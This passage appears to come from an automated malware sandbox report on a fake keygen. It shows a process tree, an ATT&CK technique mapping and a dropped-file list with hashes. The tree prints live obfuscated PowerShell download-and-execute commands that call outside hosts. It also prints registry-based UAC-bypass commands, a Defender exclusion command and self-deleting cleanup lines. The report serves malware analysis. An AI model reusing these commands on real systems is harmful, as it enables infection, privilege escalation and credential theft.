              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
              4⤵
              • Blocklisted process makes network request
              • Loads dropped DLL
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1420
              • C:\Users\Public\ewd.exe
                "C:\Users\Public\ewd.exe"
                5⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of AdjustPrivilegeToken
                PID:2900
                • C:\Windows\SysWOW64\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                  6⤵
                  • Loads dropped DLL
                  PID:1788
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                    7⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of SetThreadContext
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3012
                    • C:\Windows\SysWOW64\WScript.exe
                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                      8⤵
                      • Loads dropped DLL
                      PID:2940
                      • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                        "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                        9⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of SetThreadContext
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2748
                        • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                          "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                          10⤵
                          • Executes dropped EXE
                          PID:1604
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                      "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                      8⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Checks processor information in registry
                      PID:328
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c taskkill /pid 328 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\168153133790457\\* & exit
                        9⤵
                          PID:2996
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /pid 328
                            10⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2208
                  • C:\Users\Public\ewd.exe
                    "C:\Users\Public\ewd.exe"
                    6⤵
                    • Executes dropped EXE
                    PID:2476
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\3082.tmp\b1.hta"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1584
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1480
            • C:\Windows\SysWOW64\timeout.exe
              timeout 2
              3⤵
              • Delays execution with timeout.exe
              PID:1580
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\3082.tmp\ba.hta"
              3⤵
              • Modifies Internet Explorer settings
              • Suspicious use of WriteProcessMemory
              PID:1084
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                4⤵
                • Blocklisted process makes network request
                • Loads dropped DLL
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1488
                • C:\Users\Public\msr.exe
                  "C:\Users\Public\msr.exe"
                  5⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: MapViewOfSection
                  • Suspicious use of SetWindowsHookEx
                  PID:2496
                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                    6⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of SetThreadContext
                    • Suspicious behavior: MapViewOfSection
                    • Suspicious use of SetWindowsHookEx
                    PID:2588
                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                      7⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Checks processor information in registry
                      PID:2652
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c taskkill /pid 2652 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\483996907604505\\* & exit
                        8⤵
                          PID:1552
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /pid 2652
                            9⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1332
                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                      6⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
                      • Suspicious behavior: MapViewOfSection
                      • Suspicious use of SetWindowsHookEx
                      PID:2628
                      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                        "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                        7⤵
                        • Executes dropped EXE
                        PID:2744
                    • C:\Users\Public\msr.exe
                      "C:\Users\Public\msr.exe"
                      6⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Drops desktop.ini file(s)
                      • Modifies system certificate store
                      PID:2684
                      • C:\Users\Admin\AppData\Local\Temp\1wd1PPK5LT.exe
                        "C:\Users\Admin\AppData\Local\Temp\1wd1PPK5LT.exe"
                        7⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1712
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                          "Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\1wd1PPK5LT.exe"'
                          8⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:800
                      • C:\Users\Admin\AppData\Local\Temp\RBabUs54Us.exe
                        "C:\Users\Admin\AppData\Local\Temp\RBabUs54Us.exe"
                        7⤵
                        • Executes dropped EXE
                        • Adds Run key to start application
                        PID:3008
                        • C:\Windows\SysWOW64\Notepad.exe
                          "C:\Windows\System32\Notepad.exe"
                          8⤵
                            PID:3064
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c C:\Users\Public\Natso.bat
                              9⤵
                                PID:2676
                                • C:\Windows\SysWOW64\reg.exe
                                  reg delete hkcu\Environment /v windir /f
                                  10⤵
                                  • Modifies registry key
                                  PID:952
                                • C:\Windows\SysWOW64\reg.exe
                                  reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "
                                  10⤵
                                  • Modifies registry key
                                  PID:2840
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
                                  10⤵
                                    PID:1108
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c start /min C:\Users\Public\x.bat
                                    10⤵
                                      PID:1720
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c C:\Users\Public\Natso.bat
                                    9⤵
                                      PID:2852
                                      • C:\Windows\SysWOW64\reg.exe
                                        REG ADD "HKCU\SOFTWARE\Classes\ms-settings\shell\open\command" /t REG_SZ /d "C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f" /f
                                        10⤵
                                        • Modifies registry class
                                        PID:936
                                      • C:\Windows\SysWOW64\reg.exe
                                        REG ADD "hkcu\software\classes\ms-settings\shell\open\command" /v DelegateExecute /t REG_SZ /d " " /f
                                        10⤵
                                        • Modifies registry class
                                        PID:2880
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /c start /min C:\Users\Public\x.bat
                                        10⤵
                                          PID:2224
                                    • C:\Program Files (x86)\internet explorer\ieinstal.exe
                                      "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                                      8⤵
                                        PID:1484
                                    • C:\Users\Admin\AppData\Local\Temp\eYPP1oZQ1b.exe
                                      "C:\Users\Admin\AppData\Local\Temp\eYPP1oZQ1b.exe"
                                      7⤵
                                      • Executes dropped EXE
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      • Suspicious use of SetWindowsHookEx
                                      PID:1248
                                      • \??\c:\windows\SysWOW64\cmstp.exe
                                        "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\wz10mta1.inf
                                        8⤵
                                          PID:1040
                                      • C:\Users\Admin\AppData\Local\Temp\EFWQHA1FzQ.exe
                                        "C:\Users\Admin\AppData\Local\Temp\EFWQHA1FzQ.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        • Windows security modification
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2476
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          "powershell" Get-MpPreference -verbose
                                          8⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:560
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\msr.exe"
                                        7⤵
                                          PID:1592
                                          • C:\Windows\SysWOW64\timeout.exe
                                            timeout /T 10 /NOBREAK
                                            8⤵
                                            • Delays execution with timeout.exe
                                            PID:2720
                                • C:\Windows\SysWOW64\mshta.exe
                                  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\3082.tmp\ba1.hta"
                                  3⤵
                                  • Modifies Internet Explorer settings
                                  • Suspicious use of WriteProcessMemory
                                  PID:848
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                                    4⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1868
                                    • C:\Users\Public\ewd.exe
                                      "C:\Users\Public\ewd.exe"
                                      5⤵
                                      • Executes dropped EXE
                                      • Suspicious use of SetThreadContext
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2356
                                      • C:\Users\Public\ewd.exe
                                        "C:\Users\Public\ewd.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        PID:2964

                            Network

                            MITRE ATT&CK Matrix ATT&CK v6

                            Persistence

                            Modify Existing Service

                            1
                            T1031

                            Registry Run Keys / Startup Folder

                            1
                            T1060

                            Defense Evasion

                            Modify Registry

                            6
                            T1112

                            Disabling Security Tools

                            2
                            T1089

                            Install Root Certificate

                            1
                            T1130

                            Credential Access

                            Credentials in Files

                            3
                            T1081

                            Discovery

                            Query Registry

                            2
                            T1012

                            System Information Discovery

                            2
                            T1082

                            Collection

                            Data from Local System

                            3
                            T1005

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\ProgramData\MSVCP140.dll
                            • C:\ProgramData\freebl3.dll
                            • C:\ProgramData\freebl3.dll
                            • C:\ProgramData\freebl3.dll
                            • C:\ProgramData\mozglue.dll
                            • C:\ProgramData\mozglue.dll
                            • C:\ProgramData\mozglue.dll
                            • C:\ProgramData\msvcp140.dll
                            • C:\ProgramData\nss3.dll
                              MD5

                              bfac4e3c5908856ba17d41edcd455a51

                              SHA1

                              8eec7e888767aa9e4cca8ff246eb2aacb9170428

                              SHA256

                              e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                              SHA512

                              2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                            • C:\ProgramData\nss3.dll
                              MD5

                              bfac4e3c5908856ba17d41edcd455a51

                              SHA1

                              8eec7e888767aa9e4cca8ff246eb2aacb9170428

                              SHA256

                              e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                              SHA512

                              2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                            • C:\ProgramData\softokn3.dll
                            • C:\ProgramData\softokn3.dll
                            • C:\ProgramData\softokn3.dll
                            • C:\ProgramData\sqlite3.dll
                            • C:\ProgramData\vcruntime140.dll
                            • C:\ProgramData\vcruntime140.dll
                            • C:\ProgramData\vcruntime140.dll
                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0c385001-0ea7-4f34-9abd-9ad9da541281
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_231c2208-0720-4eec-b9f1-8bba11abd9fa
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2c552433-c0c6-4b59-b59d-98784320e1c4
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_39bd9ebf-efc5-491e-8507-4bc2976f8062
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_57c6647c-75fc-47bb-8ce4-3b8f0921c533
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6d5fa298-996f-4fc9-9c01-b2226cbdaeba
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7d6878ec-2a8b-418c-8f2b-b6fcd4b50cf8
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c8219dea-eb1f-4be0-8df0-d020070897b4
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_de4eedb8-4762-4c56-b80c-203df3aa6fa8
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e43ce3f6-b60d-4b70-bed1-86e53bf07360
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fabbb9cf-9b8c-4b2f-b33d-0de7a9a3a10e
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                            • C:\Users\Admin\AppData\Local\Temp\1wd1PPK5LT.exe
                            • C:\Users\Admin\AppData\Local\Temp\1wd1PPK5LT.exe
                            • C:\Users\Admin\AppData\Local\Temp\3082.tmp\Keygen.exe
                            • C:\Users\Admin\AppData\Local\Temp\3082.tmp\Keygen.exe
                            • C:\Users\Admin\AppData\Local\Temp\3082.tmp\b.hta
                            • C:\Users\Admin\AppData\Local\Temp\3082.tmp\b1.hta
                            • C:\Users\Admin\AppData\Local\Temp\3082.tmp\ba.hta
                            • C:\Users\Admin\AppData\Local\Temp\3082.tmp\ba1.hta
                            • C:\Users\Admin\AppData\Local\Temp\3082.tmp\m.hta
                            • C:\Users\Admin\AppData\Local\Temp\3082.tmp\m1.hta
                            • C:\Users\Admin\AppData\Local\Temp\3082.tmp\start.bat
                            • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
                            • C:\Users\Admin\AppData\Local\Temp\EFWQHA1FzQ.exe
                            • C:\Users\Admin\AppData\Local\Temp\EFWQHA1FzQ.exe
                            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                            • C:\Users\Admin\AppData\Local\Temp\RBabUs54Us.exe
                              MD5

                              013db621a3351e3fb049efd2ccad79ff

                              SHA1

                              a23394ea54dbc5342a77938a2c285ee616185560

                              SHA256

                              df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                              SHA512

                              1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                            • C:\Users\Admin\AppData\Local\Temp\RBabUs54Us.exe
                              MD5

                              013db621a3351e3fb049efd2ccad79ff

                              SHA1

                              a23394ea54dbc5342a77938a2c285ee616185560

                              SHA256

                              df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                              SHA512

                              1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                            • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs
                            • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                            • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                            • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                            • C:\Users\Admin\AppData\Local\Temp\eYPP1oZQ1b.exe
                            • C:\Users\Admin\AppData\Local\Temp\eYPP1oZQ1b.exe
                            • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                            • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                            • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                            • C:\Users\Public\Natso.bat
                            • C:\Users\Public\Natso.bat
                            • C:\Users\Public\ewd.exe
                            • C:\Users\Public\ewd.exe
                            • C:\Users\Public\ewd.exe
                            • C:\Users\Public\ewd.exe
                            • C:\Users\Public\ewd.exe
                            • C:\Users\Public\msr.exe
                            • C:\Users\Public\msr.exe
                            • C:\Users\Public\msr.exe
                            • C:\Users\Public\zkh.exe
                            • C:\Users\Public\zkh.exe
                            • C:\Users\Public\zkh.exe
                            • C:\Users\Public\zkh.exe
                            • C:\Users\Public\zkh.exe
                            • C:\Windows\temp\wz10mta1.inf
                            • \??\PIPE\lsarpc
                            • \??\PIPE\lsarpc
                            • \??\PIPE\srvsvc
                            • \??\PIPE\srvsvc
                            • \??\PIPE\srvsvc
                            • \ProgramData\mozglue.dll
                            • \ProgramData\mozglue.dll
                            • \ProgramData\mozglue.dll
                            • \ProgramData\mozglue.dll
                            • \ProgramData\msvcp140.dll
                            • \ProgramData\msvcp140.dll
                            • \ProgramData\msvcp140.dll
                            • \ProgramData\msvcp140.dll
                            • \ProgramData\nss3.dll
                              MD5

                              bfac4e3c5908856ba17d41edcd455a51

                              SHA1

                              8eec7e888767aa9e4cca8ff246eb2aacb9170428

                              SHA256

